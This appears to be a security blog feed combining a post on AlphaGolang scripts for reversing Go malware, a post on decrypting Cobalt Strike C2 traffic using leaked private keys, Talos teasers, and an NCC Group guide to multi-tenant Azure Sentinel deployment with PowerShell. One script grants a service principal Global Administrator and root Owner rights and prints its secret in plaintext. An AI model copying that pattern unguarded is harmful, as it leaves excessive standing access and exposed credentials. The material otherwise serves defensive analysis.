With AlphaGolang, we wanted to tackle two disparate problems simultaneously: the brittleness of IDAPython scripts for Go reversing and the need for clear steps to analyze these binaries.

We can’t expect everyone to be an expert in Go in order to understand their way around a binary. Less so to have to fix the tooling they’re attempting to rely on. While engineers might be tempted to address the former by elaborating a complex framework, we figured we’d swing in the opposite direction and break up the requisite functionality into smaller scripts. Those smaller digestible scripts allow us to part out a relatable methodology in steps so that analysts can pick and choose what they need as they advance in their reversing journey.

Additionally, we hope the simplicity of the project and a forthrightness about its current limitations will inspire others to contribute new steps, fixes, and additional functionality.

At this time, the first five steps are as follows:

Step 0: Identifying Go Binaries

Go Build ID Regex

By popular request, we are including a simple YARA rule to help identify Go binaries. This is a quick and scrappy solution that checks for PE, ELF, and Mach-O file headers along with a regex for a single Go Build ID string.

Step 1: Recreate pcln Table

Recreating the Go pcln table

Dealing with stripped Golang binaries is particularly awful. Reversers unfamiliar with Go are disheartened to see that despite having all of the original function names within the binary, their disassembler is unable to connect those symbols as labels for their functions. While that might seem like a grand coup for malware developers attempting to confuse and frustrate analysts, it isn’t more than a temporary inconvenience. Despite being stripped, we have enough information available to reconstruct the Go pcln table and provide the disassembler with the information it needs.

Two noteworthy points before continuing:

  • The pcln table is documented as early as Go v1.12 and has been modified as of v1.16.
  • IDA Pro v7.6+ handles Go binaries very well and is unlikely to need this step. This script will prove particularly valuable for folks using IDA v7.5 and under when dealing with stripped Go binaries.

Depending on the file's endianness, the script will locate the pcln table's magic header, walk the table converting the data to DWORDs (or QWORDs, depending on the bitness), and create a new segment with the appropriate '.gopclntab' header, effectively undoing the stripping process.

Step 2: Discover Missing Functions and Restore Function Names

Function discovery and renaming

Immediately after recreating the pcln table (or in unfortunate cases where automatic disassembly fails), function names are not automatically assigned and many functions may have eluded discovery. We are going to fix both of these issues in one simple go.

We know that the pcln table is pointing us at every function in the binary, even if IDA hasn’t recognized them. This script will walk the pcln table, check the offsets therein for an existing function, and instruct IDA to define a function wherever one is missing. The resulting number of functions can be drastically greater even in cases where disassembly seems perfect.

Additionally, we’ll borrow Tim Strazzere’s magic from the original Golang Loader Assist in order to label all of our functions. We ported the plugin to Python 3, made it compatible with the new IDA APIs, and refactored it. The functionality is now part of two separate steps (2 and 4) and easier to maintain. In this step, Strazzere’s magic will help us associate all of our functions with their original names in an IDA friendly format.

Step 3: Surface User-Generated Functions

Automatically categorizing functions

Having recovered and labeled all of our functions, we are now faced with the daunting proposition of sifting through thousands of functions. Most of these functions are part of Go’s standard packages or perhaps functionality imported from GitHub repositories. To belabor a metaphor, we now have street signs but no map. How do we fix this?

IDA v7.5 introduced the concept of Folder Views, an easily missed Godsend for the anal-retentive reverser. This feature has to be explicitly turned on via a right-click on the desired subview –whether functions, structures, imports, etc. IDA v7.6 takes this a step further by introducing a thus-far undocumented API to interact with these folder views (A heartfelt thank you to Milan Bohacek for his help in effectively wielding this API). That should enable us to automate some extraordinary time-saving functionality.

While our malware may have 5,000 functions, the majority of those functions were not written by the malware developers, they’re publicly documented, and we need nothing more than a nominal overview to know what they do.

NOBELIUM GoldMax (a.k.a. SunShuttle)
94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45

By being clever about categorizing function packages, we can actually whittle down to a fraction of the overall functions that merit analyst time. Functions will be categorized by their package prefixes and further grouped as ‘Standard Go Packages’, unlabeled (‘sub_’), uncategorized (no package prefix), and Github imports. What remains are the ‘main’ package and any custom packages added by the malware developers. For a notable example, the NOBELIUM GoldMax (a.k.a. SunShuttle) malware can be reduced from a hulking 4,771 functions to a mere 22. This is the simplest and perhaps the most valuable step towards our goal of understanding the malware’s functionality.

Step 4: Fix String References

Accurately recasting strings by reference

Finally, there’s the issue of strings in Go. Unlike all C-derivative languages, strings in Go are not null terminated. Neither are they grouped together based on their source or functionality. Rather, the linker places all of the strings in order of incremental length, with no obvious demarcation as to where one string ends and the next begins. This works because whenever a function references a string, it does so by loading the string address and a hardcoded length. While this is a safer paradigm for handling strings, it makes for an unpleasant reversing experience.

So how do we overcome this hurdle? Here's where another piece of Strazzere's Golang Loader Assist can help us. His original plugin would check functions for certain string loading patterns and use these as a guide to fix the string assignments. We have once again (partially) refactored this functionality and made it compatible with Python 3 and IDA's new APIs. We have also improved some of the logic for fixing the string blobs in place (flagged either by suspicious length or because a reference points to the middle of a blob) and added some sanity checks.

While this step is already a marked improvement, we are seeing new string loading patterns introduced with Go v1.17 that need adding and there’s definitely room for improved refactoring. We hope some of you will feel inclined to contribute.

Where Do We Go From Here?

Let’s take a step back and look at where we are after all of these steps. We have an IDB with all functions discovered, labeled, and categorized, and hopefully all of their string references are correctly annotated. This is an ideal we could seldom dream of with malware of a comparable size written in C or C++ without extensive analysis time and prior expertise.

Now that we have a clear view of the user-generated functionality, what more can we do? How else can we improve our hunting and analysis efforts?

The following are a series of ideas we'd recommend implementing in further steps:

  • How about auto-generating YARA rules for user-generated functions and their referred strings?
  • Want a better understanding of arguments as they’re passed between functions? How about automagically setting breakpoints at the runtime stack prologues and annotating the arguments back to our IDB?
  • For reversers that follow the Kwiatkowski school of rewriting the code to understand the program’s functionality, how about selectively exporting the Hex-Rays pseudocode solely for the user-generated functions?
  • How about reconstructing interfaces and type structs from runtime objects?

Got more ideas? Want to help? Head to our SentinelLabs GitHub repo for all of the scripts and contribute your own shortcuts and superpowers for analyzing Go malware!

We’d like to thank the following for their direct and indirect contributions– 

  • Tim Strazzere for his original Golang Loader Assist script, which we refactored and made compatible with Python3 and the new IDA APIs. 
  • Milan Bohacek (Avast Software s.r.o.) for his invaluable help figuring out the ida_dirtree API.
  • Joakim Kennedy (Intezer)
  • Ivan Kwiatkowski (Kaspersky GReAT) for making his Go reversing course available.
  • Igor Kuznetsov (Kaspersky GReAT) for his help understanding newer pcln tab versions.


Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1

21 October 2021 at 08:59

We found 6 private keys for rogue Cobalt Strike software, enabling C2 network traffic decryption.

The communication between a Cobalt Strike beacon (client) and a Cobalt Strike team server (C2) is encrypted with AES (even when it takes place over HTTPS). The AES key is generated by the beacon, and communicated to the C2 using an encrypted metadata blob (a cookie, by default).

RSA encryption is used to encrypt this metadata: the beacon has the public key of the C2, and the C2 has the private key.

Figure 1: C2 traffic

Public and private keys are stored in the file .cobaltstrike.beacon_keys. These keys are generated when the Cobalt Strike team server software is used for the first time.

During our fingerprinting of Internet-facing Cobalt Strike servers, we found public keys that are used by many different servers. This implies that they use the same private key, and thus that their .cobaltstrike.beacon_keys file is shared.

One possible explanation, which we verified: there are cracked versions of Cobalt Strike, used by malicious actors, that include a .cobaltstrike.beacon_keys file. This file is not part of a legitimate Cobalt Strike package, as it is generated at first use.

Searching through VirusTotal, we found 10 cracked Cobalt Strike packages: ZIP files containing a file named .cobaltstrike.beacon_keys. Out of these 10 packages, we extracted 6 unique RSA key pairs.

2 of these pairs are prevalent on the Internet: 25% of the 1,500+ Cobalt Strike servers we fingerprinted use one of these 2 key pairs.

This key information is now included in tool 1768.py, a tool developed by Didier Stevens to extract configurations of Cobalt Strike beacons.

Whenever a public key with a known private key is extracted, the tool highlights this:

Figure 2: 1768.py extracting configuration from beacon

At a minimum, this information is further confirmation that the sample came from a rogue Cobalt Strike server (and not a red team server).

Using the verbose option, the private key is also displayed.

Figure 3: using option verbose to display the private key
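
A sketch of what such an invocation might look like (the sample file name is hypothetical, and the exact spelling of the verbose flag should be checked against the tool's help output):

python 1768.py --verbose beacon_sample.bin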

This can then be used to decrypt the metadata, and the C2 traffic (more on this later).

Figure 4: decrypting metadata

In upcoming blog posts, we will show in detail how to use these private keys to decrypt metadata and decrypt C2 traffic.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Malicious campaign uses a barrage of commodity RATs to target Afghanistan and India

20 October 2021 at 12:55
Cisco Talos recently discovered a threat actor using political and government-themed malicious domains to target entities in India and Afghanistan. These attacks use dcRAT and QuasarRAT for Windows delivered via malicious documents exploiting CVE-2017-11882 — a memory corruption vulnerability in...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Beers with Talos, Ep. #110: The 10 most-exploited vulnerabilities this year (You won't believe No. 6!)

19 October 2021 at 20:13
Beers with Talos (BWT) Podcast episode No. 110 is now available. Download this episode and subscribe to Beers with Talos: Apple Podcasts, Google Podcasts, Spotify, Stitcher. If iTunes and Google Play aren't your thing, click here. We mainly spend this episode doing some catching up...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments

19 October 2021 at 17:27

NCC Group is offering a new fully Managed Detection and Response (MDR) service for our customers in Azure. This blog post gives a behind-the-scenes view of some of the automated processes involved in setting up new environments and managing custom analytics for each customer, including details about our scripting and automated build and release pipelines, which are deployed as infrastructure-as-code.

If you are:

  • a current or potential customer interested in how we manage our releases
  • just starting your journey into onboarding Sentinel for large multi-Tenant environments
  • looking to enhance existing deployment mechanisms
  • interested in a way to manage multi-Tenant deployments with varying set-ups

…you have come to the right place!

Background

Sentinel is Microsoft’s new Security Information and Event Management solution hosted entirely on Azure.

NCC Group has been providing MDR services for a number of years using Splunk and we are now adding Sentinel to the list.

The benefit of Sentinel over the Splunk offering is that you will be able to leverage existing Azure licenses and all data will be collected and visible in your own Azure tenants.

The only bits we keep on our side are the custom analytics and data enrichment functions we write for analysing the data.

What you might learn

The solution covered in this article provides a possible way to create an enterprise scale solution that, once implemented, gives the following benefits:

  • Management of a large number of tenants with differing configurations and analytics
  • Minimal manual steps for onboarding new tenants
  • Development and source control of new custom analytics
  • Management of multiple tenants within one Sentinel instance
  • Zero downtime / parallel deployments of new analytics
  • Custom web portal to manage onboarding, analytics creation, baselining, and configuration of each individual tenants’ connectors and enabled analytics

The main components

Azure Sentinel

Sentinel is Microsoft's cloud native SIEM (Security Information and Event Management) solution. It allows a large number of log and event sources to be gathered and interrogated in real time, using in-built and custom KQL to automatically identify and respond to threats.

Lighthouse

“Azure Lighthouse enables multi-tenant management with scalability, higher automation, and enhanced governance across resources.”

In essence, it allows a master tenant direct access to one or many sub or customer tenants without the need to switch directory or create custom solutions.

Lighthouse is used in this solution to connect to log analytics workspaces in additional tenants and view them within the same instance of Sentinel in our “master tenant”.

Log Analytics Workspaces

Log Analytics workspaces are where the data from sources connected to Sentinel ends up in this scenario. We will connect workspaces from multiple tenants via Lighthouse to allow for cross-tenant analysis.

Azure DevOps (ADO)

Azure DevOps provides the core functionality for this solution, used both for its CI/CD pipelines (using YAML, not Classic, for this) and its inbuilt Git repos. The solutions provided will of course work if you decide to go for a different system.

App Service

To allow for easy management of configurations, onboarding and analytics development / baselining we hosted a small Web application written in Blazor, to avoid having to manually change JSON config files. The app also draws in MITRE and other additional data to enrich analytics.

Technologies breakdown:

In order for us to create and manage the required services we need to make use of Infrastructure as Code (IaC), scripting, and automated build and release pipelines, as well as have a way to develop a management portal.

The technologies we ended up using for this were:

  • ARM Templates for general resource deployments and some of the connectors
  • PowerShell using Microsoft AZ / Sentinel and Roberto Rodriguez's Azure-Sentinel2Go
  • API calls for baselining and connectors not available through PowerShell modules
  • Blazor for configuration portal development
  • C# for API backend Azure function development
  • YAML Azure DevOps Pipelines

Phase 1: Tenant Onboarding

Let’s step through this diagram.

We are going to have a portal that allows us to configure a new client, go through an approval step to ensure configs are peer reviewed before going into production (by pushing the configuration into a new branch in source control), and then trigger a deployment pipeline.

The pipeline triggers 2 Tenant deployments.

Tenant A is our "Master tenant" that will hold the main Sentinel instance, all custom analytics, alerts, and playbooks, and connect, using Lighthouse, to all "Sub tenants" (Tenant B).

In large organisations we would create a 1:1 mapping for each sub tenant by deploying additional workspaces that then point to the individual tenants. This has the benefit of keeping the analytics centralised, protecting intellectual property. You could, however, deploy them directly into the actual workspaces once Lighthouse is set up, or have one workspace that queries all the others.

Tenant B and all other additional Tenants have their own instance of Sentinel with all required connectors enabled and need to have the lighthouse connection initiated from that side.

Pre-requisites:

To be able to deploy to either of the tenants we need Service connections for Azure DevOps to be in place.

“Sub tenant” deployment:

Some of the Sentinel connectors need pretty extreme permissions to be enabled; for example, to configure the Active Directory connector properly we need the Global Administrator and Security Administrator roles as well as root scope Owner permissions on the tenant.

In most cases, once the initial set up of the "sub tenant" is done there will rarely be a need to add additional connectors or deploy to that tenant, as all analytics are created on the "Master tenant". I would strongly suggest either disabling or completely removing the Tenant B service connection after setup. If you are planning to regularly change connectors and are happy with the risk of leaving this service principal in place, then the steps will allow you to do this.

A sample script for setting up the "Sub tenant" Service Principal:

$rgName = 'resourceGroupName' ## set the value of this to the resource group name containing the Sentinel log analytics workspace
Connect-AzAccount
$cont = Get-AzContext
Connect-AzureAD -TenantId $cont.Tenant

## Create the service principal Azure DevOps will authenticate as
$sp = New-AzADServicePrincipal -DisplayName ADOServicePrincipalName

Sleep 20 ## give the new service principal time to replicate before assigning roles
## Try root scope Owner first; also assign subscription and resource group scope Owner as a fallback
$assignment = New-AzRoleAssignment -RoleDefinitionName Owner -Scope '/' -ServicePrincipalName $sp.ApplicationId -ErrorAction SilentlyContinue
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)/resourceGroups/$($rgName)" -ServicePrincipalName $sp.ApplicationId
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)" -ServicePrincipalName $sp.ApplicationId

## Recover the plaintext secret so it can be entered into the Azure DevOps service connection
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sp.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
## Grant the directory roles needed to configure the Active Directory connector
$roles = Get-AzureADDirectoryRole | Where-Object {$_.displayName -in ("Global Administrator","Security Administrator")}
foreach($role in $roles)
{
    Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.Id
}
## True when the root scope Owner assignment succeeded
$activeDirectorySettingsPermissions = ($null -ne $assignment)
$sp | select @{Name = 'Secret'; Expression = {$UnsecureSecret}},@{Name = 'tenant'; Expression = {$cont.Tenant}},@{Name = 'Active Directory Settings Permissions'; Expression = {$activeDirectorySettingsPermissions}},@{Name = 'sub'; Expression = {$cont.Subscription}}, applicationId, Id, DisplayName

This script will:

  1. create a new Service Principal,
  2. set the Global Administrator and Security Administrator roles for the principal,
  3. attempt to grant root scope Owner permissions, with subscription scope Owner as a backup, as this is the minimum required to connect Lighthouse if the root scope permissions are not set.

The end of the script prints out the details required to set this up as a Service connection in Azure DevOps. You could of course continue on and add the Service connection directly to Azure DevOps if the person running the script has access to both, but that was not feasible for my requirements.

For Tenant A we have 2 options.

Option 1: One Active Directory group to rule them all

This is something you might do if you are setting things up for your own multi-tenant environments. If you have multiple environments to manage and different analyst access requirements for each, I would strongly suggest using option 2.

Create an empty Azure Active Directory group either manually or using

(New-AzADGroup -DisplayName 'GroupName' -MailNickname 'none').Id
(Get-AzTenant).Id

You will need the ID of both the Group and the tenant in a second so don’t lose it just yet.

Once the group is created, set up a Service Connection to your Master tenant from Azure DevOps (just use the normal connection Wizard), then add the Service Principal to the newly created group as well as users you want to have access to the Sentinel (log analytics) workspaces.

To match the additional steps in Option 2, create a Variable group (either directly but masked or connected to a KeyVault depending on your preference) in Azure DevOps (Pipelines->Library->+Variable Group)

Make sure you restrict both Security and Pipeline permissions for the variable group to only be usable for the appropriate pipelines and users whenever creating variable groups.

Then Add:

AAdGroupID with your new Group ID

And

TenantID with the Tenant ID of the master tenant.

Then reference the group at the top of your YAML pipeline, within the job section, with:

variables:
  - group: YourGroupName

Option 2: One group per “Sub tenant”

If you are managing customers, this is a much better way to handle things. You will be able to assign different users to each group, ensuring only the correct people have access to the environments they are meant to manage.

However, to be able to do this you need a Service Connection with some additional rights in your “Master Tenant”, so your pipelines can automatically create customer specific AD groups and add the Service principal to them.

Set up a Service Connection from Azure DevOps to your Master Tenant, then find the Service Principal and give it the following permissions

  • Azure Active Directory Graph
    • Directory.ReadWrite.All
  • Microsoft Graph
    • Directory.ReadWrite.All
    • PrivilegedAccess.ReadWrite.AzureADGroup

Then include the following script in your pipeline to create the group for each customer and add the service principal to it.

param(
    [string]$AADgroupName,
    [string]$ADOServicePrincipalName
)
# Only create the group if it doesn't exist yet
$group1 = Get-AzADGroup -DisplayName $AADgroupName -ErrorAction SilentlyContinue
if(-not $group1)
{
    $guid1 = New-Guid
    $group1 = New-AzADGroup -DisplayName $AADgroupName -MailNickname $guid1 -Description $AADgroupName
    $spID = (Get-AzADServicePrincipal -DisplayName $ADOServicePrincipalName).Id
    Add-AzADGroupMember -MemberObjectId $spID -TargetGroupObjectId $group1.Id
}
$id = $group1.Id
$tenant = (Get-AzTenant).Id
# Hand the IDs back to the pipeline as output variables
Write-Host "##vso[task.setvariable variable=AAdGroupId;isOutput=true]$($id)"
Write-Host "##vso[task.setvariable variable=TenantId;isOutput=true]$($tenant)"

The Write-Host calls at the end of the script output the group and tenant ID back to the pipeline for use when setting up Lighthouse later.
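To consume those outputs in a later task of the same job, reference them through the step's name. A minimal sketch (the step name "creategroup" and the script path are hypothetical):

- task: AzurePowerShell@5
  name: creategroup   # hypothetical step name; output variables are addressed via it
  inputs:
    azureSubscription: 'Master Tenant Service Connection'
    ScriptType: 'FilePath'
    ScriptPath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/CreateCustomerGroup.ps1'   # hypothetical path
    ScriptArguments: '-AADgroupName "CustomerGroupName" -ADOServicePrincipalName "ADOServicePrincipalName"'
    azurePowerShellVersion: 'LatestVersion'

- script: echo $(creategroup.AAdGroupId) $(creategroup.TenantId)
  displayName: 'Consume the IDs, e.g. when deploying Lighthouse'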

With the boring bits out of the way, let’s get into the core of things.

Client configurations

First, we need to create configuration files to be able to manage the connectors and analytics that get deployed for each “Sub tenant”.

You can of course do this manually, but I opted to go for a slightly more user-friendly approach with the Blazor App.

The main bits we need are:

  • A name for the config
  • The Azure DevOps Service Connection name for the target Sub tenant,
  • Azure Region (if you are planning to deploy to multiple regions),
  • Target Resource Group and Target Workspace, this is either where the current Log Analytics of your target environment already exist or should be created.

Client config Schema:

    public class ClientConfig
    {
        public string ClientName { set; get; } = "";
        public string ServiceConnection { set; get; } = "";
        public List<Alert> SentinelAlerts { set; get; } = new List<Alert>();
        public List<Search> SavedSearches { set; get; } = new List<Search>();
        public string TargetWorkspaceName { set; get; } = "";
        public string TargetResourceGroup { set; get; } = "";
        public string Location { get; set; } = "UK South";
        public string connectors { get; set; } = "";
    }

Sample Config output:

{
    "ClientName": "TenantB",
    "ServiceConnection": "ServiceConnectionName",
    "SentinelAlerts": [
        {
            "Name": "ncc_t1558.003_kerberoasting"
        },
        {
            "Name": "ncc_t1558.003_kerberoasting_downgrade_v1a"
        }
    ],
    "SavedSearches": [],
    "TargetWorkspaceName": "targetworkspace",
    "TargetResourceGroup": "targetresourcegroup",
    "Location": "UK South",
    "connectors": "Office365,ThreatIntelligence,OfficeATP,AzureAdvancedThreatProtection,AzureActiveDirectory,MicrosoftDefenderAdvancedThreatProtection,AzureSecurityCenter,MicrosoftCloudAppSecurity,AzureActivity,SecurityEvents,WindowsFirewall,DNS,Syslog"
}

This data can then be pushed onto a storage account and imported into Git from a pipeline triggered through the app.

pool:
  vmImage: 'windows-latest'

steps:
- checkout: self
  persistCredentials: true
  clean: true

- task: AzurePowerShell@5
  displayName: 'Export Configs'
  inputs:
    azureSubscription: 'Tenant A Service Connection name'
    ScriptType: 'FilePath'
    ScriptPath: '$(Build.SourcesDirectory)/Scripts/Exports/ConfigExport.ps1'
    ScriptArguments: '-resourceGroupName "StorageAccountResourceGroupName" -storageName "storageaccountname" -outPath "Sentinel\ClientConfigs\" -container "configs"'
    azurePowerShellVersion: 'LatestVersion'

- task: PowerShell@2
  displayName: 'Commit Changes to new Git Branch'
  inputs:
    filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/PushToGit.ps1'
    arguments: '-branchName conf$(Build.BuildNumber)'

Where ConfigExport.ps1 is:

param(
    [string]$resourceGroupName,
    [string]$storageName,
    [string]$outPath,
    [string]$container
)

$ctx = (Get-AzStorageAccount -ResourceGroupName $resourceGroupName -Name $storageName).Context
$blobs = Get-AzStorageBlob -Container $container -Context $ctx

# Recreate the output folder so removed configs don't linger locally
if(-not (Test-Path -Path $outPath))
{
    New-Item -ItemType Directory $outPath -Force
}
Get-ChildItem -Path $outPath -Recurse | Remove-Item -Force -Recurse
foreach($file in $blobs)
{
    Get-AzStorageBlobContent -Context $ctx -Container $container -Blob $file.Name -Destination ("$($outPath)/$($file.Name)") -Force
}

And PushToGit.ps1

param(
    [string]$branchName
)
git --version
git switch -c $branchName
git add -A
# placeholder identity for automated pipeline commits
git config user.email "build@example.com"
git config user.name "Automated Build"
git commit -a -m "Committing rules to git"
git push --set-upstream -f origin $branchName

This will download the config files, create a new Branch in the Azure DevOps Git Repo and upload the files.

The branch can then be reviewed and merged. You could bypass this and check directly into the main branch if you want less manual intervention, but the manual review adds an extra layer of security to ensure no configs are accidentally / maliciously changed.

Creating Analytics

For analytics creation we have 2 options.

  1. Create Analytics in a Sentinel Test environment and export them to git. This will allow you to source control analytics as well as review any changes before allowing them into the main branch.
param(
    [string]$resourceGroupName,
    [string]$workspaceName,
    [string]$outPath,
    [string]$module='Scripts/Modules/Remove-InvalidFileNameChars.ps1'
)
Import-Module $module

Install-Module -Name Az.Accounts -AllowClobber -Force
Install-Module -Name Az.SecurityInsights -AllowClobber -Force

$results = Get-AzSentinelAlertRule -WorkspaceName $workspaceName -ResourceGroupName $resourceGroupName
$results
$myExtension = ".json"
$output = @()
foreach($temp in $results){
    if($temp.DisplayName)
    {
        $resultName = $temp.DisplayName
        if($temp.query)
        {
            if($temp.query.Contains($workspaceName))
            {
                # Swap the test workspace name for a placeholder that deployment replaces later
                $temp.query = $temp.query -replace $workspaceName , '{{targetWorkspace}}'
                $myExportPath = "$($outPath)\Alerts\$($temp.productFilter)\"
                if(-not (Test-Path -Path $myExportPath))
                {
                    New-Item -ItemType Directory -Force -Path $myExportPath
                }
                $rule = $temp | ConvertTo-Json
                $resultName = Remove-InvalidFileNameChars -Name $resultName
                $folder = "$($myExportPath)$($resultName)$($myExtension)"
                $properties = [pscustomobject]@{DisplayName=($temp.DisplayName);RuleName=$resultName;Category=($temp.productFilter);Path=$myExportPath}
                $output += $properties
                $rule | Out-File $folder -Force
            }
        }
    }
}

Note the -replace $workspaceName , ‘{{targetWorkspace}}’. This replaces the actual workspace used in our test environments via workspace(‘testworkspaceName’) with workspace(‘{{targetWorkspace}}’), allowing us to substitute the actual “Sub tenant” workspace name when deploying.
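At deployment time the substitution is simply reversed. A minimal sketch (the file variables are hypothetical, not the full deployment script):

# Swap the placeholder back to the sub tenant's workspace name from the client config
$config = Get-Content -Path $customerConfig | ConvertFrom-Json
$rule = Get-Content -Path $ruleFile -Raw | ConvertFrom-Json   # $ruleFile: path to one exported alert
$rule.query = $rule.query -replace '{{targetWorkspace}}' , $config.TargetWorkspaceName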

  2. Create your own analytics in a custom portal; for the Blazor portal I found Microsoft.Azure.Kusto.Language very useful for validating the KQL queries.

The benefit of creating your own is the ability to enrich what goes into them.

You might, for example, want to add full MITRE details into the analytics to be able to easily generate a MITRE coverage report for the created analytics.
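As a rough sketch of the payoff (assuming your custom rule files carry the comma-separated tactic field used later in this post, and the folder layout of the export script above):

# Hedged sketch: summarise tactic coverage across the exported custom analytics
$rules = Get-ChildItem -Path "$outPath\Alerts" -Recurse -Filter *.json |
    ForEach-Object { Get-Content $_.FullName -Raw | ConvertFrom-Json }
$rules | ForEach-Object { $_.tactic -split ',' } |
    Group-Object |
    Select-Object @{Name = 'Tactic'; Expression = {$_.Name}}, Count |
    Sort-Object Count -Descending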

If you are this way inclined, when deploying the analytics, use a generic template from Sentinel and replace the required values before submitting it back to your target Sentinel.

{
    "AlertRuleTemplateName": null,
    "DisplayName": "{DisplayPrefix}{DisplayName}",
    "Description": "{Description}",
    "Enabled": true,
    "LastModifiedUtc": "\/Date(1619707105808)\/",
    "Query": "{query}",
    "QueryFrequency": {
        "Ticks": 9000000000,
        "Days": 0,
        "Hours": 0,
        "Milliseconds": 0,
        "Minutes": 15,
        "Seconds": 0,
        "TotalDays": 0.010416666666666666,
        "TotalHours": 0.25,
        "TotalMilliseconds": 900000,
        "TotalMinutes": 15,
        "TotalSeconds": 900
    },
    "QueryPeriod": {
        "Ticks": 9000000000,
        "Days": 0,
        "Hours": 0,
        "Milliseconds": 0,
        "Minutes": 15,
        "Seconds": 0,
        "TotalDays": 0.010416666666666666,
        "TotalHours": 0.25,
        "TotalMilliseconds": 900000,
        "TotalMinutes": 15,
        "TotalSeconds": 900
    },
    "Severity": "{Severity}",
    "SuppressionDuration": {
        "Ticks": 180000000000,
        "Days": 0,
        "Hours": 5,
        "Milliseconds": 0,
        "Minutes": 0,
        "Seconds": 0,
        "TotalDays": 0.20833333333333331,
        "TotalHours": 5,
        "TotalMilliseconds": 18000000,
        "TotalMinutes": 300,
        "TotalSeconds": 18000
    },
    "SuppressionEnabled": false,
    "TriggerOperator": 0,
    "TriggerThreshold": 0,
    "Tactics": [
        "DefenseEvasion"
    ],
    "Id": "{alertRuleID}",
    "Name": "{alertRuleguid}",
    "Type": "Microsoft.SecurityInsights/alertRules",
    "Kind": "Scheduled"
}

Let’s Lighthouse this up!

Now that we have the service connections and initial client config in place, we can start building the onboarding pipeline for Tenant B.

As part of this we will cover:

  • Generating consistent naming conventions
  • Creating the Log Analytics workspace specified in config and enabling Sentinel
  • Setting up the Lighthouse connection to Tenant A
  • Enabling the required connectors in Sentinel

Consistent naming (optional)

There are a lot of different ways to handle naming conventions.

I quite like to push a few parameters into a PowerShell script, then write the naming conventions back to the pipeline, so the convention script can be used in multiple pipelines to provide consistency and easy maintainability.

The below script generates variables for a select number of resources, then pushes them out to the pipeline.

param(
    [string]$location,
    [string]$environment,
    [string]$customerIdentifier,
    [string]$instance
)
$location = $location.ToLower()
$environment = $environment.ToLower()
$customerIdentifier = $customerIdentifier.ToLower()
$instance = $instance.ToLower()
$conventions = New-Object -TypeName psobject 
$conventions | Add-Member -MemberType NoteProperty -Name CustomerResourceGroup -Value "rg-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name LogAnalyticsWorkspace -Value "la-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name CustLogicAppPrefix -Value "wf-$($location)-$($environment)-$($customerIdentifier)-"
$conventions | Add-Member -MemberType NoteProperty -Name CustFunctionAppPrefix -Value "fa-$($location)-$($environment)-$($customerIdentifier)-"
foreach($convention in $conventions.psobject.Properties | Select-Object -Property name, value)
{
Write-Host "##vso[task.setvariable variable=$($convention.name);isOutput=true]$($convention.Value)"
}

Sample use would be

  - task: PowerShell@2
    name: "naming"
    inputs:
      filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/GenerateNamingConvention.ps1'
      arguments: '-location "some Location" -environment "some environment" -customerIdentifier "some identifier" -instance "some instance"'

  - task: AzurePowerShell@5
    displayName: 'Sample task using variables from naming task'
    inputs:
      azureSubscription: '$(ServiceConnection)'
      ScriptType: 'FilePath'
      ScriptPath: 'some script path'
      ScriptArguments: '-resourceGroup "$(naming.CustomerResourceGroup)" -workspaceName "$(naming.LogAnalyticsWorkspace)"'
      azurePowerShellVersion: 'LatestVersion'
      pwsh: true

Configure Log Analytics workspace in sub tenant / enable Sentinel

You could do the following using ARM; however, in the actual solution I am doing a lot of additional tasks with the workspace that were much easier to achieve in script (hence my choice to script it instead).

Create new workspace if it doesn’t exist:

param(
    [string]$resourceGroupName,
    [string]$workspaceName,
    [string]$Location,
    [string]$sku
)
$rg = Get-AzResourceGroup -Name $resourceGroupName -ErrorAction SilentlyContinue
if(-not $rg)
{
    New-AzResourceGroup -Name $resourceGroupName -Location $Location
}
$ws = Get-AzOperationalInsightsWorkspace -ResourceGroupName $resourceGroupName -Name $workspaceName -ErrorAction SilentlyContinue
if(-not $ws)
{
    $ws = New-AzOperationalInsightsWorkspace -Location $Location -Name $workspaceName -Sku $sku -ResourceGroupName $resourceGroupName -RetentionInDays 90
}

Check if Sentinel is already enabled for the Workspace and enable it if not:

param(
    [string]$resourceGroupName,
    [string]$workspaceName
)
Install-Module AzSentinel -Scope CurrentUser -Force -AllowClobber
Import-Module AzSentinel

$solutions = Get-AzOperationalInsightsIntelligencePack -ResourceGroupName $resourceGroupName -WorkspaceName $workspaceName -ErrorAction SilentlyContinue

if (($solutions | Where-Object Name -eq 'SecurityInsights').Enabled) {
    Write-Host "SecurityInsights solution is already enabled for workspace $($workspaceName)"
}
else {
    Set-AzSentinel -WorkspaceName $workspaceName -Confirm:$false
}

Setting up Lighthouse to the Master tenant

param(
    [string]$customerConfig = '',
    [string]$templateFile = '',
    [string]$templateParameterFile = '',
    [string]$AadGroupID = '',
    [string]$tenantId = ''
)
$config = Get-Content -Path $customerConfig | ConvertFrom-Json
# Inject the master tenant AAD group into the parameter file
$parameters = (Get-Content -Path $templateParameterFile -Raw) -replace '{principalId}' , $AadGroupID

Set-Content -Value $parameters -Path $templateParameterFile -Force
New-AzDeployment -Name "Lighthouse" -Location "$($config.Location)" -TemplateFile $templateFile -TemplateParameterFile $templateParameterFile -rgName "$($config.TargetResourceGroup)" -managedByTenantId "$tenantId"

